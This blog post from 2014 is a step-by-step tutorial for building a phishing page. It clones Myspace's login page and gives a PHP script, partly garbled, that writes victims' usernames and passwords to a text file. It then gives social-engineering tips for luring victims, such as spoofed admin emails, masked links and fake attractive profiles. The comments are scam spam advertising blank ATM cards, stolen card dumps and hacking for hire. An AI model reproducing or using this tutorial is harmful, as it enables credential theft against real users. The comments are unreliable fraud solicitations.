How to Create a Phisher For a Website?

by Saturday, January 18, 2014 5 comments



1. Intro
There are couple of other phishing tutorials around here, but some people seem to
have problems understanding them. So I'll try to be as simple as possible, and if you
have problems understanding it, then you need to get some beginner level computer
knowledge first.
-This article was written for educational purpose only. I'm not responsible for any
illegal activity that you may commit.

2. What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes the 
username and the password to a file, or does whatever you want.

3. How to make one?
All you need is a web hosting service with PHP enabled.
We will use t35. Go to spam.com and sign up for a free account. In this tutorial we 
will make a phishing site for Myspace(the procedure is equivalent for most of the 
sites). While not signed in myspace, open anyone's profile and click on his picture. 
That will lead you to Myspace's login page that has the red box with"You Must Be 
Logged-In to do That!" just above your login form. Now, click File>Save Page As, and 
save the myspace page to your Desktop. Open your saved page with any text 
editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it.
Get back to your t35 account and click on 'New File' and paste the Myspace's source 
code there. Name the file 'index.php'(without the ''), and save it.
Now you have made a page equal to Myspace. Everything on that page will have the 
same function as if it were on the original site. The link to your phish site will be 
'www.xxx.t35.com/index.php' - where 'xxx' is the name of your account. 

But there is a little problem. When someone enters his username and password and 
press login, it logs him into the real myspace. 
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging 
them into the real site, it writes the username and password to a text file. 
Open your 'index.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code(for the sign in 
button, search button, etc.). We need to find the 'action=some link' that refers to 
the Login button.

After some searching, we find the: 
<h5 class="heading">
Member Login
</h5>
<form action="http://secure.myspace.com/index.cfm?
fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 
value="/wEPDwUJNTMzMjE3MzI5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYW
NrS2V5X18WAgUwY3RsMDAkT 
WFpbiRTcGxhc2hEaXNwbGF5JGN0bDAwJFJlbWVtYmVyX0NoZWNrYm94BTBjdGw
wMCRNYWluJFNwbGFzaERpc3BsYXkkY3RsMDAkTG9naW5fSW1hZ2VCdXR0b24=" 
/>
</div>

and we know that 'action="http://secure.myspace.com/index.cfm?
fuseaction=login.process"' refers to the login button.
Change:
action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="login.php"
and save the file.
Formerly, when you click the login button it would take the values in the username and
password boxes, and execute the functions in the 
'http://secure.myspace.com/index.cfm?fuseaction=login.process' file. 
Now when you click the login button it will take the values in the username in 
password boxes, and execute the functions in the 'login.php' file on your site(which 
doesn't exist yet).
All we have to do now, is to create a 'login.php' file that contains a function that 
writes down the username and password into a text document.
Make another file named 'login.php'(without the quotes) and paste the following code 
in it: 

<?php
header ('Location: http://myspace.com/
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $val
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

The function of login.php is simple. It opens a file named 'passes.txt'(and creates 
if it doesn't already exist) and enter the informations there(the username and 
password).
Congratulations! You have a phisher!
The link to your phish site is:
http://xxx.t35.com/index.php -where 'xxx' is your account name.
The link to your text file is:
http://xxx.t35.com/passes.txt
Or you may access it from your account.
Note that you can choose whatever names you like for index.php, login.php and 
passes.txt. but the .php and .txt must stay the same.

Note that you can choose whatever names you like for index.php, login.php and 
passes.txt. but the .php and .txt must stay the same.
 
4. How to trick people to fall for it.
There are billions of ways how to do it, your creativity is your limit. 
Most common way is to make an email similar to the admin, and sending them some 
report with a link to log in the site(your phish site). Ofcourse you will mask the link. 
How to mask the link?
If you're posting it on forums, or anywhere where bb code is enabled, you're doing 
this: 
[url=YourPhishSiteLink]TheOriginalSiteLink[/url] 
For example, www.google.com looks like a google, but it leads you to yahoo when you 
click it.

If you're making the phisher for myspace, and want to get random ppl to it, you can 
simply make some hot chick account and put some hot pic that will lead to your phish 
site when clicked. So when they click the lusty image, they will be led to your phish 
site telling them they need to log in to see that.
Like this: 
[url=YourPhishSiteLink][img]link of the image[/img][/url] 
When sending emails see for the option 'hyperlink', and it's self explainable once you
see it.
There are many other ways, and as I said, your creativity is the limit.
 
5. Outro
I hope that this tutorial was helpful and simple enough. It explains how to make a 
phisher, and how it works. Although is written for Myspace, the procedure is 
equivalent for almost every other login site(for hotmail is different). After this, it's 
up to you to explore, experiment and dive in the world of social engineering.

Unknown

Developer

Cras justo odio, dapibus ac facilisis in, egestas eget quam. Curabitur blandit tempus porttitor. Vivamus sagittis lacus vel augue laoreet rutrum faucibus dolor auctor.

5 comments:

  1. Get Your Urgent Xmas Promo Blank Atm Card Now Contact Email Via:Cryptoatmhacker@gmail.com
    I am sure a lot of us are still not aware of the recent development of the Blank ATM card.. An ATM card that can change your financial status within few days. With this Blank ATM card, you can withdraw between $2,000-$3,000 -$5, 500-$8,800-$12, 000-$20,000-$35,000 -$50,000 daily from any ATM machine in the world. There is no risk of getting caught by any form of security if you followed the instructions properly. The Blank ATM card is also sophisticated due to the fact that the card has its own security making your transaction very safe and untraceable. i am not a stupid man that i will come out to the public and start saying what someone have not done. For more info contact Mr john and also on how you are going to get your order..
    Order yours today via Email: cryptoatmhacker@gmail.com

    ReplyDelete
  2. If you ever want to change or up your university grades contact cybergolden hacker he'll get it done and show a proof of work done before payment. He's efficient, reliable and affordable. He can also perform all sorts of hacks including text, whatsapp, password decrypt,hack any mobile phone, Escape Bancruptcy, Delete Criminal Records and the rest

    Email: cybergoldenhacker at gmail dot com

    ReplyDelete
  3. BE SMART AND BECOME RICH IN LESS THAN 3DAYS (williamshackers@hotmail.com) or WhatsApp +15592016732… It all depends on how fast you can be to get the new PROGRAMMED blank ATM card that is capable of hacking into any ATM machine,anywhere in the world. I got to know about this BLANK ATM CARD when I was searching for job online about a month ago..It has really changed my life for good and now I can say I'm rich and I can never be poor again. The least money I get in a day with it is about $50,000.(fifty thousand USD) Every now and then I keeping pumping money into my account. Though is illegal,there is no risk of being caught ,because it has been programmed in such a way that it is not traceable,it also has a technique that makes it impossible for the CCTVs to detect you..For details on how to get yours today, email the hackers on: (williamshackers@hotmail.com). Tell your loved once too, and start to live large. That's the simple testimony of how my life changed for good… Love you all …the email address again is email (williamshackers@hotmail.com) or WhatsApp +15592016732…

    ReplyDelete
  4. Looking to Solve Your Financials Solutions
    Be careful anytime you are buying cc or dumps, i was searching for a legit vendor before and i was ripped so many time until i met someone who was recommended by Admin of carding forums.
    They sell the following Fresh good Dumps and with pin, Different Countries CVV, Fullz, Banks logins, Paypal with G-talk verified, Ebay, Amazon accounts logins, bestbuy, all kinds of shops account available, RDP, Mailers PHP,Best Leads. EMV Software Reader Writer all are available.

    They are from Russia among the best, they gave me my biggest cash out in cc and dumps till date, i advise you to get your tools ready and have a good setup if you want to get success in your transaction
    you can reach them on below contacts

    Email: gary.jones00222@gmail.com
    jdenterprises@qualityservice.com,
    hark212@hotmail.com
    Telegram: https://t.me/validvendors
    icq: chat- 711343039
    Your financial solutions, stop stressing in silence
    Thank me later

    ReplyDelete
  5. Do you need to increase your credit score?
    Do you intend to upgrade your school grade?
    Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
    Do you need any information concerning any database.
    Do you need to retrieve deleted files?
    Do you need to clear your criminal records or DMV?
    Do you want to remove any site or link from any blog?
    you should contact this hacker, he is reliable and good at the hack jobs..
    contact : cybergoldenhacker at gmail dot com

    ReplyDelete